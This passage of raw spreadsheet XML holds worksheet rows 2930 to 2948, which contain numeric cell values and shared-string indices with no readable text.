      <c r="O2930" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2930" s="12" t="s">
        <v>20035</v>
      </c>
      <c r="Q2930" s="12" t="s">
        <v>28339</v>
      </c>
      <c r="R2930" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2930" s="12" t="s">
        <v>20036</v>
      </c>
      <c r="T2930" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2930" s="12" t="s">
        <v>20037</v>
      </c>
      <c r="V2930" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W2930" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2930" s="12">
        <v>3</v>
      </c>
      <c r="Y2930" s="12" t="s">
        <v>20038</v>
      </c>
    </row>
    <row r="2931" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2931" s="12">
        <v>13840</v>
      </c>
      <c r="B2931" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2931" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2931" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2931" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2931" s="12" t="s">
        <v>20039</v>
      </c>
      <c r="H2931" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2931" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2931" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K2931" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2931" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2931" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2931" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2931" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2931" s="12" t="s">
        <v>20040</v>
      </c>
      <c r="Q2931" s="12" t="s">
        <v>28316</v>
      </c>
      <c r="R2931" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2931" s="12" t="s">
        <v>20041</v>
      </c>
      <c r="T2931" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2931" s="12" t="s">
        <v>20042</v>
      </c>
      <c r="V2931" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W2931" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2931" s="12">
        <v>1</v>
      </c>
      <c r="Y2931" s="12" t="s">
        <v>20043</v>
      </c>
    </row>
    <row r="2932" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2932" s="12">
        <v>13841</v>
      </c>
      <c r="B2932" s="12" t="s">
        <v>30328</v>
      </c>
      <c r="D2932" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2932" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2932" s="12" t="s">
        <v>20044</v>
      </c>
      <c r="H2932" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2932" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J2932" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2932" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2932" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2932" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2932" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2932" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2932" s="12" t="s">
        <v>20045</v>
      </c>
      <c r="Q2932" s="12" t="s">
        <v>28316</v>
      </c>
      <c r="R2932" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2932" s="12" t="s">
        <v>20046</v>
      </c>
      <c r="T2932" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2932" s="12" t="s">
        <v>20047</v>
      </c>
      <c r="V2932" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W2932" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2932" s="12">
        <v>8</v>
      </c>
      <c r="Y2932" s="12" t="s">
        <v>20048</v>
      </c>
    </row>
    <row r="2933" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2933" s="12">
        <v>13842</v>
      </c>
      <c r="B2933" s="12" t="s">
        <v>30518</v>
      </c>
      <c r="C2933" s="12" t="s">
        <v>30516</v>
      </c>
      <c r="D2933" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2933" s="12" t="s">
        <v>31516</v>
      </c>
      <c r="F2933" s="12" t="s">
        <v>30546</v>
      </c>
      <c r="G2933" s="12" t="s">
        <v>20049</v>
      </c>
      <c r="H2933" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2933" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2933" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2933" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2933" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2933" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2933" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2933" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2933" s="12" t="s">
        <v>20045</v>
      </c>
      <c r="Q2933" s="12" t="s">
        <v>28316</v>
      </c>
      <c r="R2933" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2933" s="12" t="s">
        <v>20050</v>
      </c>
      <c r="T2933" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2933" s="12" t="s">
        <v>20051</v>
      </c>
      <c r="V2933" s="12" t="s">
        <v>3916</v>
      </c>
      <c r="W2933" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2933" s="12">
        <v>1</v>
      </c>
      <c r="Y2933" s="12" t="s">
        <v>20052</v>
      </c>
    </row>
    <row r="2934" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2934" s="12">
        <v>13843</v>
      </c>
      <c r="B2934" s="12" t="s">
        <v>30323</v>
      </c>
      <c r="D2934" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2934" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2934" s="12" t="s">
        <v>20053</v>
      </c>
      <c r="H2934" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2934" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2934" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K2934" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2934" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2934" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2934" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2934" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2934" s="12" t="s">
        <v>20045</v>
      </c>
      <c r="Q2934" s="12" t="s">
        <v>28316</v>
      </c>
      <c r="R2934" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2934" s="12" t="s">
        <v>20054</v>
      </c>
      <c r="T2934" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2934" s="12" t="s">
        <v>20055</v>
      </c>
      <c r="V2934" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W2934" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2934" s="12">
        <v>2</v>
      </c>
      <c r="Y2934" s="12" t="s">
        <v>20056</v>
      </c>
    </row>
    <row r="2935" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2935" s="12">
        <v>13845</v>
      </c>
      <c r="B2935" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2935" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2935" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2935" s="12" t="s">
        <v>20057</v>
      </c>
      <c r="H2935" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2935" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2935" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2935" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2935" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2935" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2935" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2935" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2935" s="12" t="s">
        <v>19986</v>
      </c>
      <c r="Q2935" s="12" t="s">
        <v>28316</v>
      </c>
      <c r="R2935" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2935" s="12" t="s">
        <v>20058</v>
      </c>
      <c r="T2935" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2935" s="12" t="s">
        <v>20059</v>
      </c>
      <c r="V2935" s="12" t="s">
        <v>3916</v>
      </c>
      <c r="W2935" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2935" s="12">
        <v>2</v>
      </c>
      <c r="Y2935" s="12" t="s">
        <v>20060</v>
      </c>
    </row>
    <row r="2936" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2936" s="12">
        <v>13860</v>
      </c>
      <c r="B2936" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2936" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="F2936" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2936" s="12" t="s">
        <v>20069</v>
      </c>
      <c r="H2936" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2936" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J2936" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K2936" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2936" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2936" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2936" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2936" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2936" s="12" t="s">
        <v>13538</v>
      </c>
      <c r="Q2936" s="12" t="s">
        <v>28313</v>
      </c>
      <c r="R2936" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2936" s="12" t="s">
        <v>20070</v>
      </c>
      <c r="T2936" s="12" t="s">
        <v>20071</v>
      </c>
      <c r="U2936" s="12" t="s">
        <v>20072</v>
      </c>
      <c r="V2936" s="12" t="s">
        <v>10825</v>
      </c>
      <c r="W2936" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2936" s="12">
        <v>19</v>
      </c>
      <c r="Y2936" s="12" t="s">
        <v>20073</v>
      </c>
    </row>
    <row r="2937" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2937" s="12">
        <v>13861</v>
      </c>
      <c r="B2937" s="12" t="s">
        <v>31324</v>
      </c>
      <c r="D2937" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2937" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F2937" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2937" s="12" t="s">
        <v>20074</v>
      </c>
      <c r="H2937" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2937" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2937" s="12" t="s">
        <v>9893</v>
      </c>
      <c r="K2937" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2937" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2937" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2937" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2937" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2937" s="12" t="s">
        <v>20075</v>
      </c>
      <c r="Q2937" s="12" t="s">
        <v>28316</v>
      </c>
      <c r="R2937" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2937" s="12" t="s">
        <v>20076</v>
      </c>
      <c r="T2937" s="12" t="s">
        <v>20077</v>
      </c>
      <c r="U2937" s="12" t="s">
        <v>20078</v>
      </c>
      <c r="V2937" s="12" t="s">
        <v>20079</v>
      </c>
      <c r="W2937" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2937" s="12">
        <v>19</v>
      </c>
      <c r="Y2937" s="12" t="s">
        <v>20080</v>
      </c>
    </row>
    <row r="2938" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2938" s="12">
        <v>13863</v>
      </c>
      <c r="B2938" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C2938" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D2938" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F2938" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G2938" s="12" t="s">
        <v>20081</v>
      </c>
      <c r="H2938" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2938" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J2938" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2938" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2938" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2938" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2938" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2938" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2938" s="12" t="s">
        <v>20045</v>
      </c>
      <c r="Q2938" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2938" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2938" s="12" t="s">
        <v>20082</v>
      </c>
      <c r="T2938" s="12" t="s">
        <v>18807</v>
      </c>
      <c r="U2938" s="12" t="s">
        <v>20083</v>
      </c>
      <c r="V2938" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W2938" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2938" s="12">
        <v>2</v>
      </c>
      <c r="Y2938" s="12" t="s">
        <v>20084</v>
      </c>
    </row>
    <row r="2939" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2939" s="12">
        <v>13865</v>
      </c>
      <c r="B2939" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2939" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E2939" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F2939" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G2939" s="12" t="s">
        <v>20085</v>
      </c>
      <c r="H2939" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2939" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J2939" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K2939" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2939" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2939" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2939" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2939" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2939" s="12" t="s">
        <v>13538</v>
      </c>
      <c r="Q2939" s="12" t="s">
        <v>28313</v>
      </c>
      <c r="R2939" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2939" s="12" t="s">
        <v>20086</v>
      </c>
      <c r="T2939" s="12" t="s">
        <v>19243</v>
      </c>
      <c r="U2939" s="12" t="s">
        <v>20087</v>
      </c>
      <c r="V2939" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W2939" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2939" s="12">
        <v>14</v>
      </c>
      <c r="Y2939" s="12" t="s">
        <v>20088</v>
      </c>
    </row>
    <row r="2940" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2940" s="12">
        <v>13866</v>
      </c>
      <c r="B2940" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C2940" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D2940" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F2940" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G2940" s="12" t="s">
        <v>20089</v>
      </c>
      <c r="H2940" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2940" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2940" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K2940" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2940" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2940" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2940" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2940" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2940" s="12" t="s">
        <v>20045</v>
      </c>
      <c r="Q2940" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2940" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2940" s="12" t="s">
        <v>20090</v>
      </c>
      <c r="T2940" s="12" t="s">
        <v>18807</v>
      </c>
      <c r="U2940" s="12" t="s">
        <v>20091</v>
      </c>
      <c r="V2940" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W2940" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2940" s="12">
        <v>7</v>
      </c>
      <c r="Y2940" s="12" t="s">
        <v>20092</v>
      </c>
    </row>
    <row r="2941" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2941" s="12">
        <v>13867</v>
      </c>
      <c r="B2941" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C2941" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D2941" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2941" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2941" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G2941" s="12" t="s">
        <v>20093</v>
      </c>
      <c r="H2941" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2941" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2941" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K2941" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2941" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2941" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2941" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2941" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2941" s="12" t="s">
        <v>20045</v>
      </c>
      <c r="Q2941" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2941" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2941" s="12" t="s">
        <v>20094</v>
      </c>
      <c r="T2941" s="12" t="s">
        <v>18807</v>
      </c>
      <c r="U2941" s="12" t="s">
        <v>20095</v>
      </c>
      <c r="V2941" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W2941" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2941" s="12">
        <v>2</v>
      </c>
      <c r="Y2941" s="12" t="s">
        <v>20096</v>
      </c>
    </row>
    <row r="2942" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2942" s="12">
        <v>13871</v>
      </c>
      <c r="B2942" s="12" t="s">
        <v>28354</v>
      </c>
      <c r="D2942" s="12" t="s">
        <v>30466</v>
      </c>
      <c r="F2942" s="12" t="s">
        <v>30481</v>
      </c>
      <c r="G2942" s="12" t="s">
        <v>20097</v>
      </c>
      <c r="H2942" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2942" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2942" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K2942" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2942" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2942" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2942" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2942" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2942" s="12" t="s">
        <v>20098</v>
      </c>
      <c r="Q2942" s="12" t="s">
        <v>28313</v>
      </c>
      <c r="R2942" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2942" s="12" t="s">
        <v>20099</v>
      </c>
      <c r="T2942" s="12" t="s">
        <v>20100</v>
      </c>
      <c r="U2942" s="12" t="s">
        <v>20101</v>
      </c>
      <c r="V2942" s="12" t="s">
        <v>9751</v>
      </c>
      <c r="W2942" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2942" s="12">
        <v>5</v>
      </c>
      <c r="Y2942" s="12" t="s">
        <v>20102</v>
      </c>
    </row>
    <row r="2943" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2943" s="12">
        <v>13872</v>
      </c>
      <c r="B2943" s="12" t="s">
        <v>30796</v>
      </c>
      <c r="C2943" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D2943" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2943" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F2943" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2943" s="12" t="s">
        <v>20103</v>
      </c>
      <c r="H2943" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2943" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J2943" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K2943" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2943" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2943" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2943" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2943" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2943" s="12" t="s">
        <v>19963</v>
      </c>
      <c r="Q2943" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2943" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2943" s="12" t="s">
        <v>20104</v>
      </c>
      <c r="T2943" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2943" s="12" t="s">
        <v>20105</v>
      </c>
      <c r="V2943" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="W2943" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2943" s="12">
        <v>1</v>
      </c>
      <c r="Y2943" s="12" t="s">
        <v>20106</v>
      </c>
    </row>
    <row r="2944" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2944" s="12">
        <v>13884</v>
      </c>
      <c r="B2944" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2944" s="12" t="s">
        <v>30427</v>
      </c>
      <c r="E2944" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F2944" s="12" t="s">
        <v>30432</v>
      </c>
      <c r="G2944" s="12" t="s">
        <v>20107</v>
      </c>
      <c r="H2944" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2944" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2944" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K2944" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2944" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2944" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2944" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2944" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2944" s="12" t="s">
        <v>20108</v>
      </c>
      <c r="Q2944" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2944" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2944" s="12" t="s">
        <v>20109</v>
      </c>
      <c r="T2944" s="12" t="s">
        <v>18567</v>
      </c>
      <c r="U2944" s="12" t="s">
        <v>20110</v>
      </c>
      <c r="V2944" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W2944" s="12">
        <v>13667</v>
      </c>
      <c r="X2944" s="12">
        <v>10</v>
      </c>
      <c r="Y2944" s="12" t="s">
        <v>20111</v>
      </c>
    </row>
    <row r="2945" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2945" s="12">
        <v>13890</v>
      </c>
      <c r="B2945" s="12" t="s">
        <v>30329</v>
      </c>
      <c r="D2945" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2945" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2945" s="12" t="s">
        <v>20112</v>
      </c>
      <c r="H2945" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2945" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J2945" s="12" t="s">
        <v>1314</v>
      </c>
      <c r="K2945" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2945" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2945" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2945" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2945" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2945" s="12" t="s">
        <v>13538</v>
      </c>
      <c r="Q2945" s="12" t="s">
        <v>28313</v>
      </c>
      <c r="R2945" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2945" s="12" t="s">
        <v>20113</v>
      </c>
      <c r="T2945" s="12" t="s">
        <v>11800</v>
      </c>
      <c r="U2945" s="12" t="s">
        <v>20114</v>
      </c>
      <c r="V2945" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W2945" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2945" s="12">
        <v>1</v>
      </c>
      <c r="Y2945" s="12" t="s">
        <v>20115</v>
      </c>
    </row>
    <row r="2946" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2946" s="12">
        <v>13891</v>
      </c>
      <c r="B2946" s="12" t="s">
        <v>31324</v>
      </c>
      <c r="D2946" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2946" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2946" s="12" t="s">
        <v>31307</v>
      </c>
      <c r="G2946" s="12" t="s">
        <v>20116</v>
      </c>
      <c r="H2946" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2946" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2946" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K2946" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2946" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2946" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2946" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2946" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2946" s="12" t="s">
        <v>19986</v>
      </c>
      <c r="Q2946" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2946" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2946" s="12" t="s">
        <v>20117</v>
      </c>
      <c r="T2946" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2946" s="12" t="s">
        <v>20118</v>
      </c>
      <c r="V2946" s="12" t="s">
        <v>15191</v>
      </c>
      <c r="W2946" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2946" s="12">
        <v>9</v>
      </c>
      <c r="Y2946" s="12" t="s">
        <v>20119</v>
      </c>
    </row>
    <row r="2947" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2947" s="12">
        <v>13892</v>
      </c>
      <c r="B2947" s="12" t="s">
        <v>31325</v>
      </c>
      <c r="C2947" s="12" t="s">
        <v>31328</v>
      </c>
      <c r="D2947" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2947" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2947" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2947" s="12" t="s">
        <v>20120</v>
      </c>
      <c r="H2947" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2947" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2947" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K2947" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2947" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2947" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2947" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2947" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2947" s="12" t="s">
        <v>20045</v>
      </c>
      <c r="Q2947" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2947" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2947" s="12" t="s">
        <v>20121</v>
      </c>
      <c r="T2947" s="12" t="s">
        <v>20122</v>
      </c>
      <c r="U2947" s="12" t="s">
        <v>20123</v>
      </c>
      <c r="V2947" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W2947" s="12">
        <v>15079</v>
      </c>
      <c r="X2947" s="12">
        <v>27</v>
      </c>
      <c r="Y2947" s="12" t="s">
        <v>20124</v>
      </c>
    </row>
    <row r="2948" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2948" s="12">
        <v>13893</v>
      </c>
      <c r="B2948" s="12" t="s">
        <v>30796</v>
      </c>
      <c r="C2948" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D2948" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2948" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2948" s="12" t="s">
        <v>30788</v>
      </c>
      <c r="G2948" s="12" t="s">
        <v>20125</v>
      </c>
      <c r="H2948" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2948" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2948" s="12" t="s">
        <v>10043</v>
      </c>
      <c r="K2948" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2948" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2948" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2948" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2948" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2948" s="12" t="s">
        <v>20126</v>
      </c>
      <c r="Q2948" s="12" t="s">
        <v>28313</v>
      </c>
      <c r="R2948" s="12" t="s">
        <v>17</v>
      </c>
